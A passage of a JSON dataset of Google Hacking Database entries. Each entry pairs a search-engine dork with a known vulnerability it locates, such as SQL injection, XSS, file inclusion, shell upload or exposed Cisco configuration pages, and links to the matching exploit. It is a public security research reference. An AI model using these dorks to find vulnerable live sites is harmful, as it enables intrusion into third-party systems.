"Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:employer_profile.php%3Fcompid%3D", "shortDescription": "inurl:employer_profile.php?compid=", "textualDescription": "ZEEJOBSITE 2.0 (adid) Remote SQL Injection Vulnerability - CVE: 2008-3706: http://www.exploit-db.com/exploits/6249" }, { "signatureReferenceNumber": "2595", "link": "https://www.exploit-db.com/ghdb/2595/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_awd_song", "shortDescription": "inurl:com_awd_song", "textualDescription": "Joomla JE Awd Song Component Persistent XSS Vulnerability - CVE: 2010-2613: http://www.exploit-db.com/exploits/14059" }, { "signatureReferenceNumber": "2599", "link": "https://www.exploit-db.com/ghdb/2599/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22MangoBery+1.0+Alpha%22", "shortDescription": "\"MangoBery 1.0 Alpha\"", "textualDescription": "MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability - CVE: 2007-1837: http://www.exploit-db.com/exploits/3598" }, { "signatureReferenceNumber": "2600", "link": "https://www.exploit-db.com/ghdb/2600/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:view_group.php%3Fid%3D", "shortDescription": "inurl:view_group.php?id=", "textualDescription": "BookMarks Favourites Script (view_group.php id) SQL Injection Vuln - CVE: 2008-6007: http://www.exploit-db.com/exploits/6637" }, { "signatureReferenceNumber": "2601", "link": "https://www.exploit-db.com/ghdb/2601/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=mod.php%3Fmod%3Dpublisher%26op%3Dprintarticle%26artid%3D", "shortDescription": "mod.php?mod=publisher&op=printarticle&artid=", "textualDescription": "eNdonesia 8.4 SQL Injection Vulnerability - CVE: 2010-3461: http://www.exploit-db.com/exploits/15006" }, { "signatureReferenceNumber": "2602", "link": "https://www.exploit-db.com/ghdb/2602/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Foption%3Dcom_spa%22", "shortDescription": "inurl:\"index.php?option=com_spa\"", "textualDescription": "Joomla Component com_spa SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14423" }, { "signatureReferenceNumber": "2605", "link": "https://www.exploit-db.com/ghdb/2605/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22photo_album.php%3Falb_id%3D%22", "shortDescription": "inurl:\"photo_album.php?alb_id=\"", "textualDescription": "SpireCMS v2.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10408" }, { "signatureReferenceNumber": "2606", "link": "https://www.exploit-db.com/ghdb/2606/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext+:+%22Website+by+conceptinternetltd%22", "shortDescription": "intext : \"Website by conceptinternetltd\"", "textualDescription": "Concept E-commerce SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14512" }, { "signatureReferenceNumber": "2607", "link": "https://www.exploit-db.com/ghdb/2607/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+%22index.php%3Fp%3Dgallerypic+img_id%22", "shortDescription": "allinurl: \"index.php?p=gallerypic img_id\"", "textualDescription": "Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability - CVE: 2008-6210: http://www.exploit-db.com/exploits/5415" }, { "signatureReferenceNumber": "2608", "link": "https://www.exploit-db.com/ghdb/2608/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:com_jpad", "shortDescription": "allinurl:com_jpad", "textualDescription": "Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth) - CVE: 2008-4715: http://www.exploit-db.com/exploits/5493" }, { "signatureReferenceNumber": "2610", "link": "https://www.exploit-db.com/ghdb/2610/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:%22com_candle%22", "shortDescription": "allinurl:\"com_candle\"", "textualDescription": "Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5221" }, { "signatureReferenceNumber": "2611", "link": "https://www.exploit-db.com/ghdb/2611/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+FlatPress%22", "shortDescription": "\"powered by FlatPress\"", "textualDescription": "FlatPress 0.909.1 Stored XSS Vulnerability: http://www.exploit-db.com/exploits/12034" }, { "signatureReferenceNumber": "2612", "link": "https://www.exploit-db.com/ghdb/2612/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:ugroups.php%3FUID%3D", "shortDescription": "inurl:ugroups.php?UID=", "textualDescription": "TubeGuru Video Sharing Script (UID) SQL Injection Vulnerability - CVE: 2008-3674: http://www.exploit-db.com/exploits/6170" }, { "signatureReferenceNumber": "2613", "link": "https://www.exploit-db.com/ghdb/2613/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:option%3Dcom_livechat", "shortDescription": "allinurl:option=com_livechat", "textualDescription": "Joomla Live Chat (SQL/Proxy) Multiple Remote Vulnerabilities - CVE: 2008-6883: http://www.exploit-db.com/exploits/7441" }, { "signatureReferenceNumber": "2614", "link": "https://www.exploit-db.com/ghdb/2614/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+PHP+Melody+1.5.3", "shortDescription": "Powered by PHP Melody 1.5.3", "textualDescription": "blog ink Bypass Setting Vulnerability: http://www.exploit-db.com/exploits/11462" }, { "signatureReferenceNumber": "2615", "link": "https://www.exploit-db.com/ghdb/2615/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+phpMyDesktop|arcade+v1.0+(final)", "shortDescription": "Powered by phpMyDesktop|arcade v1.0 (final)", "textualDescription": "PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) RFI Vulnerability: http://www.exploit-db.com/exploits/4755" }, { "signatureReferenceNumber": "2616", "link": "https://www.exploit-db.com/ghdb/2616/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_products+%22intCategoryId%22", "shortDescription": "inurl:com_products \"intCategoryId\"", "textualDescription": "Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11691" }, { "signatureReferenceNumber": "2617", "link": "https://www.exploit-db.com/ghdb/2617/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22guestbook.admin.php%3Faction%3Dsettings%22", "shortDescription": "inurl:\"guestbook.admin.php?action=settings\"", "textualDescription": "Jax Guestbook 3.50 Admin Login - CVE: 2009-4447: http://www.exploit-db.com/exploits/10626" }, { "signatureReferenceNumber": "2620", "link": "https://www.exploit-db.com/ghdb/2620/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Fmod%3Djeuxflash", "shortDescription": "inurl:index.php?mod=jeuxflash", "textualDescription": "KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection Vulnerability - CVE: 2007-4922: http://www.exploit-db.com/exploits/4400" }, { "signatureReferenceNumber": "2622", "link": "https://www.exploit-db.com/ghdb/2622/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22track.php%3Fid%3D%22", "shortDescription": "inurl:\"track.php?id=\"", "textualDescription": "SFS EZ BIZ PRO (track.php id) Remote SQL Injection Vulnerability - CVE: 2008-6245: http://www.exploit-db.com/exploits/6910" }, { "signatureReferenceNumber": "2623", "link": "https://www.exploit-db.com/ghdb/2623/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Ladder+Scripts+by%22", "shortDescription": "\"Ladder Scripts by\"", "textualDescription": "My Gaming Ladder 7.5 (ladderid) SQL Injection Vulnerability - CVE: 2008-1791: http://www.exploit-db.com/exploits/5401" }, { "signatureReferenceNumber": "2624", "link": "https://www.exploit-db.com/ghdb/2624/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powergap%22+or+%22s04.php%22+or+s01.php+or+s02.php", "shortDescription": "\"powergap\" or \"s04.php\" or s01.php or s02.php", "textualDescription": "POWERGAP 2003 (s0x.php) Remote File Include Vulnerability - CVE: 2006-4236: http://www.exploit-db.com/exploits/2201" }, { "signatureReferenceNumber": "2625", "link": "https://www.exploit-db.com/ghdb/2625/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Developed+by+Bispage.com%22", "shortDescription": "\"Developed by Bispage.com\"", "textualDescription": "bispage Bypass Vulnerability: http://www.exploit-db.com/exploits/11555" }, { "signatureReferenceNumber": "2626", "link": "https://www.exploit-db.com/ghdb/2626/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22PKs+Movie+Database%22", "shortDescription": "\"PKs Movie Database\"", "textualDescription": "PKs Movie Database 3.0.3 XSS / SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/5095" }, { "signatureReferenceNumber": "2628", "link": "https://www.exploit-db.com/ghdb/2628/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:enq/big.asp%3Fid%3D", "shortDescription": "inurl:enq/big.asp?id=", "textualDescription": "(big.asp) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12533" }, { "signatureReferenceNumber": "2629", "link": "https://www.exploit-db.com/ghdb/2629/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Script+cr%C3%A9%C3%A9+par+Funewik+-+Dezign-Box+%C2%A9+France", "shortDescription": "Script cr\u00e9\u00e9 par Funewik - Dezign-Box \u00a9 France", "textualDescription": "Galerie Dezign-Box France Multi Vulnerability: http://www.exploit-db.com/exploits/11523" }, { "signatureReferenceNumber": "2630", "link": "https://www.exploit-db.com/ghdb/2630/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allintext:%22Powered+By+Buddy+Zone%22", "shortDescription": "allintext:\"Powered By Buddy Zone\"", "textualDescription": "Buddy Zone 1.5 (view_sub_cat.php cat_id) SQL Injection Vulnerability - CVE: 2007-3549: http://www.exploit-db.com/exploits/4127" }, { "signatureReferenceNumber": "2631", "link": "https://www.exploit-db.com/ghdb/2631/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22+Website+Design+and+Hosting+By+Netricks,+Inc.%22", "shortDescription": "intext:\" Website Design and Hosting By Netricks, Inc.\"", "textualDescription": "Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12736" }, { "signatureReferenceNumber": "2632", "link": "https://www.exploit-db.com/ghdb/2632/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=com_thyme", "shortDescription": "com_thyme", "textualDescription": "Joomla Component Thyme 1.0 (event) SQL Injection Vulnerability - CVE: 2008-6116: http://www.exploit-db.com/exploits/7182" }, { "signatureReferenceNumber": "3610", "link": "https://www.exploit-db.com/ghdb/3610/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/level/15/exec/-/configure/http", "shortDescription": "inurl:/level/15/exec/-/configure/http", "textualDescription": "Default Cisco 2800 Series page" }, { "signatureReferenceNumber": "3611", "link": "https://www.exploit-db.com/ghdb/3611/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/exec/show/tech-support/cr", "shortDescription": "inurl:/exec/show/tech-support/cr", "textualDescription": "Default Cisco 2800 Series page" }, { "signatureReferenceNumber": "2636", "link": "https://www.exploit-db.com/ghdb/2636/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22PHP+WEBQUEST+VERSION+%22+or+inurl:%22/phpwebquest/%22", "shortDescription": "\"PHP WEBQUEST VERSION \" or inurl:\"/phpwebquest/\"", "textualDescription": "PHP Webquest 2.6 Get Database Credentials Vulnerability - CVE: 2008-0249: http://www.exploit-db.com/exploits/4872" }, { "signatureReferenceNumber": "2638", "link": "https://www.exploit-db.com/ghdb/2638/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=All+right+reserved+2002-2003+(MSN/Web+Server+Creator)", "shortDescription": "All right reserved 2002-2003 (MSN/Web Server Creator)", "textualDescription": "Web Server Creator - Web Portal v 0.1 Multi Vulnerability - CVE: 2010-1113: http://www.exploit-db.com/exploits/11569" }, { "signatureReferenceNumber": "2640", "link": "https://www.exploit-db.com/ghdb/2640/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powerd+by+www.e-webtech.com%22", "shortDescription": "\"Powerd by www.e-webtech.com\"", "textualDescription": "e-webtech (page.asp) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12571" }, { "signatureReferenceNumber": "2641", "link": "https://www.exploit-db.com/ghdb/2641/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+PhpMesFilms", "shortDescription": "powered by PhpMesFilms", "textualDescription": "PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability - CVE: 2009-0598: http://www.exploit-db.com/exploits/7660" }, { "signatureReferenceNumber": "3612", "link": "https://www.exploit-db.com/ghdb/3612/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/level/15/exec/-", "shortDescription": "inurl:/level/15/exec/-", "textualDescription": "Default Cisco 2800 Series page" }, { "signatureReferenceNumber": "2645", "link": "https://www.exploit-db.com/ghdb/2645/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Internet+Photoshow+-+Slideshow%22", "shortDescription": "\"Internet Photoshow - Slideshow\"", "textualDescription": "Internet Photoshow (Special Edition) Insecure Cookie Handling Vuln - CVE: 2008-2282: http://www.exploit-db.com/exploits/5617" }, { "signatureReferenceNumber": "2646", "link": "https://www.exploit-db.com/ghdb/2646/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:choosecard.php%3Fcatid%3D", "shortDescription": "inurl:choosecard.php?catid=", "textualDescription": "WEBBDOMAIN Post Card 1.02 (catid) SQL Injection Vulnerability - CVE: 2008-6622: http://www.exploit-db.com/exploits/6977" }, { "signatureReferenceNumber": "2647", "link": "https://www.exploit-db.com/ghdb/2647/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Real+Estate+Portal%22", "shortDescription": "\"Powered by Real Estate Portal\"", "textualDescription": "NetArtMedia Real Estate Portal 1.2 (ad_id) SQL Injection Vuln - CVE: 2008-5309: http://www.exploit-db.com/exploits/7208" }, { "signatureReferenceNumber": "2648", "link": "https://www.exploit-db.com/ghdb/2648/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:browsecats.php%3Fcid%3D", "shortDescription": "inurl:browsecats.php?cid=", "textualDescription": "PozScripts Classified Ads Script (cid) SQL Injection Vulnerability - CVE: 2008-3672: http://www.exploit-db.com/exploits/6169" }, { "signatureReferenceNumber": "2649", "link": "https://www.exploit-db.com/ghdb/2649/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_mdigg", "shortDescription": "inurl:com_mdigg", "textualDescription": "Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln - CVE: 2008-6149: http://www.exploit-db.com/exploits/7574" }, { "signatureReferenceNumber": "2651", "link": "https://www.exploit-db.com/ghdb/2651/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22by+in-link%22++or++%22Powered+by+In-Link+2.%22", "shortDescription": "\"by in-link\" or \"Powered by In-Link 2.\"", "textualDescription": "In-link 2.3.4 (ADODB_DIR) Remote File Include Vulnerabilities: http://www.exploit-db.com/exploits/2295" }, { "signatureReferenceNumber": "2652", "link": "https://www.exploit-db.com/ghdb/2652/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:trr.php%3Fid%3D", "shortDescription": "inurl:trr.php?id=", "textualDescription": "Ad Board (id) Remote SQL Injection Vulnerability - CVE: 2008-3725: http://www.exploit-db.com/exploits/6271" }, { "signatureReferenceNumber": "2653", "link": "https://www.exploit-db.com/ghdb/2653/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22kroax.php%3Fcategory%22", "shortDescription": "inurl:\"kroax.php?category\"", "textualDescription": "PHP-Fusion Mod Kroax 4.42 (category) SQL Injection Vulnerability - CVE: 2008-5196: http://www.exploit-db.com/exploits/5942" }, { "signatureReferenceNumber": "2654", "link": "https://www.exploit-db.com/ghdb/2654/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Reciprocal+Links+Manager%22", "shortDescription": "\"Powered by Reciprocal Links Manager\"", "textualDescription": "Reciprocal Links Manager 1.1 (site) SQL Injection Vulnerability - CVE: 2008-4086: http://www.exploit-db.com/exploits/6349" }, { "signatureReferenceNumber": "2656", "link": "https://www.exploit-db.com/ghdb/2656/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allintext:%22Latest+Pictures%22+Name+++Gender+++Profile+++Rating", "shortDescription": "allintext:\"Latest Pictures\" Name Gender Profile Rating", "textualDescription": "Pictures Rating (index.php msgid) Remote SQL Injection Vulnerbility - CVE: 2007-3881: http://www.exploit-db.com/exploits/4191" }, { "signatureReferenceNumber": "2658", "link": "https://www.exploit-db.com/ghdb/2658/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Powered+by+eDocStore%22", "shortDescription": "intext:\"Powered by eDocStore\"", "textualDescription": "eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability - CVE: 2007-3452: http://www.exploit-db.com/exploits/4108" }, { "signatureReferenceNumber": "2660", "link": "https://www.exploit-db.com/ghdb/2660/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+AM4SS+1.0", "shortDescription": "Powered by AM4SS 1.0", "textualDescription": "Advneced Management For Services Sites (File Disclosure) Vulnerabilities: http://www.exploit-db.com/exploits/12859" }, { "signatureReferenceNumber": "2661", "link": "https://www.exploit-db.com/ghdb/2661/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+AlstraSoft+SendIt+Pro%22", "shortDescription": "\"Powered by AlstraSoft SendIt Pro\"", "textualDescription": "AlstraSoft SendIt Pro Remote File Upload Vulnerability - CVE: 2008-6932: http://www.exploit-db.com/exploits/7101" }, { "signatureReferenceNumber": "2663", "link": "https://www.exploit-db.com/ghdb/2663/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_content", "shortDescription": "inurl:com_content", "textualDescription": "Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln - CVE: 2008-6923: http://www.exploit-db.com/exploits/6025" }, { "signatureReferenceNumber": "2664", "link": "https://www.exploit-db.com/ghdb/2664/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22noticias.php%3FnotiId%3D%22", "shortDescription": "inurl:\"noticias.php?notiId=\"", "textualDescription": "Ele Medios CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10418" }, { "signatureReferenceNumber": "2665", "link": "https://www.exploit-db.com/ghdb/2665/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Foption%3Dcom_huruhelpdesk%22", "shortDescription": "inurl:\"index.php?option=com_huruhelpdesk\"", "textualDescription": "Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability - CVE: 2010-2907: http://www.exploit-db.com/exploits/14449" }, { "signatureReferenceNumber": "2667", "link": "https://www.exploit-db.com/ghdb/2667/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Article+Directory", "shortDescription": "Powered by Article Directory", "textualDescription": "Authenication Bypass Vulnerability in Articles Directory: http://www.exploit-db.com/exploits/12445" }, { "signatureReferenceNumber": "2668", "link": "https://www.exploit-db.com/ghdb/2668/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Copyright+2005+Affiliate+Directory%22", "shortDescription": "\"Copyright 2005 Affiliate Directory\"", "textualDescription": "SFS Affiliate Directory (id) SQL Injection Vulnerability - CVE: 2008-3719: http://www.exploit-db.com/exploits/6270" }, { "signatureReferenceNumber": "2669", "link": "https://www.exploit-db.com/ghdb/2669/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Foption%3Dcom_bookjoomlas%22", "shortDescription": "inurl:\"index.php?option=com_bookjoomlas\"", "textualDescription": "Joomla Component com_bookjoomlas 0.1 SQL Injection Vulnerability - CVE: 2009-1263: http://www.exploit-db.com/exploits/8353" }, { "signatureReferenceNumber": "2670", "link": "https://www.exploit-db.com/ghdb/2670/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=DevMass+Shopping+Cart", "shortDescription": "DevMass Shopping Cart", "textualDescription": "DevMass Shopping Cart 1.0 Remote File Include Vulnerability - CVE: 2007-6133: http://www.exploit-db.com/exploits/4642" }, { "signatureReferenceNumber": "2671", "link": "https://www.exploit-db.com/ghdb/2671/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Foption%3Dcom_allhotels", "shortDescription": "inurl:index.php?option=com_allhotels", "textualDescription": "Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability - CVE: 2008-5874: http://www.exploit-db.com/exploits/7568" }, { "signatureReferenceNumber": "2672", "link": "https://www.exploit-db.com/ghdb/2672/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+aflog%22", "shortDescription": "\"powered by aflog\"", "textualDescription": "aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies - CVE: 2008-4784: http://www.exploit-db.com/exploits/6818" }, { "signatureReferenceNumber": "2673", "link": "https://www.exploit-db.com/ghdb/2673/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Foption%3Dcom_simplefaq%22", "shortDescription": "inurl:\"index.php?option=com_simplefaq\"", "textualDescription": "Mambo Component SimpleFAQ 2.11 Remote SQL Injection Vulnerability - CVE: 2007-4456: http://www.exploit-db.com/exploits/4296" }, { "signatureReferenceNumber": "2674", "link": "https://www.exploit-db.com/ghdb/2674/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:couponsite/index.php%3Fpage%3D", "shortDescription": "inurl:couponsite/index.php?page=", "textualDescription": "Coupon Script 4.0 (id) Remote SQL Injection Vulnerability - CVE: 2008-4090: http://www.exploit-db.com/exploits/6348" }, { "signatureReferenceNumber": "2675", "link": "https://www.exploit-db.com/ghdb/2675/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22directory.php%3Fax%3Dlist%22+gaming", "shortDescription": "inurl:\"directory.php?ax=list\" gaming", "textualDescription": "Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5374" }, { "signatureReferenceNumber": "2677", "link": "https://www.exploit-db.com/ghdb/2677/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22script+by+RECIPE+SCRIPT%22", "shortDescription": "\"script by RECIPE SCRIPT\"", "textualDescription": "The Recipe Script 5 Remote XSS Vulnerability: http://www.exploit-db.com/exploits/8967" }, { "signatureReferenceNumber": "2679", "link": "https://www.exploit-db.com/ghdb/2679/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Foption%3Dcom_jobline%22", "shortDescription": "inurl:\"index.php?option=com_jobline\"", "textualDescription": "Joomla Component Jobline 1.3.1 Blind SQL Injection Vulnerability - CVE: 2009-2554: http://www.exploit-db.com/exploits/9187" }, { "signatureReferenceNumber": "2680", "link": "https://www.exploit-db.com/ghdb/2680/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Dosya+Yukle+Scrtipi+v1.0", "shortDescription": "Dosya Yukle Scrtipi v1.0", "textualDescription": "Dosya Yukle Scrtipi v1.0 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11620" }, { "signatureReferenceNumber": "2681", "link": "https://www.exploit-db.com/ghdb/2681/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+modules-php-op-modload+%22req+view_cat%22", "shortDescription": "allinurl: modules-php-op-modload \"req view_cat\"", "textualDescription": "PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability - CVE: 2008-0827: http://www.exploit-db.com/exploits/5147" }, { "signatureReferenceNumber": "2684", "link": "https://www.exploit-db.com/ghdb/2684/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Absolute+File+Send%22", "shortDescription": "\"Powered by Absolute File Send\"", "textualDescription": "Absolute File Send 1.0 Remote Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6881" }, { "signatureReferenceNumber": "2686", "link": "https://www.exploit-db.com/ghdb/2686/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:wapmain.php%3Foption%3D", "shortDescription": "inurl:wapmain.php?option=", "textualDescription": "Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12440" }, { "signatureReferenceNumber": "2688", "link": "https://www.exploit-db.com/ghdb/2688/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:%22com_na_content%22", "shortDescription": "allinurl:\"com_na_content\"", "textualDescription": "Mambo Component Sermon 0.2 (gid) SQL Injection Vulnerability - CVE: 2008-0721: http://www.exploit-db.com/exploits/5076" }, { "signatureReferenceNumber": "2689", "link": "https://www.exploit-db.com/ghdb/2689/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/#sclient=psy&hl=en&site=&source=hp&q=inurl:%22com_jcalpro%22", "shortDescription": "inurl:\"com_jcalpro\"", "textualDescription": "Joomla Component com_jcalpro 1.5.3.6 Remote File Inclusion - CVE: 2009-4431: http://www.exploit-db.com/exploits/10587" }, { "signatureReferenceNumber": "2690", "link": "https://www.exploit-db.com/ghdb/2690/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Webiz", "shortDescription": "Powered by Webiz", "textualDescription": "(Webiz) local SHELL Upload Vulnerability: http://www.exploit-db.com/exploits/12797" }, { "signatureReferenceNumber": "2691", "link": "https://www.exploit-db.com/ghdb/2691/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:category.php%3Fcate_id%3D", "shortDescription": "inurl:category.php?cate_id=", "textualDescription": "GC Auction Platinum (cate_id) Remote SQL Injection Vulnerability - CVE: 2008-3413: http://www.exploit-db.com/exploits/6144" }, { "signatureReferenceNumber": "2693", "link": "https://www.exploit-db.com/ghdb/2693/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=CaLogic+Calendars+V1.2.2", "shortDescription": "CaLogic Calendars V1.2.2", "textualDescription": "CaLogic Calendars 1.2.2 (CLPath) Remote File Include Vulnerabilities - CVE: 2006-2570: http://www.exploit-db.com/exploits/1809" }, { "signatureReferenceNumber": "2694", "link": "https://www.exploit-db.com/ghdb/2694/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+2008+Free+Image+%26+File+Hosting", "shortDescription": "Copyright 2008 Free Image & File Hosting", "textualDescription": "Free Image & File Hosting Upload Vulnerability: http://www.exploit-db.com/exploits/12105" }, { "signatureReferenceNumber": "2695", "link": "https://www.exploit-db.com/ghdb/2695/", "category": "Advisories and Vulnerabilities", "querystring": 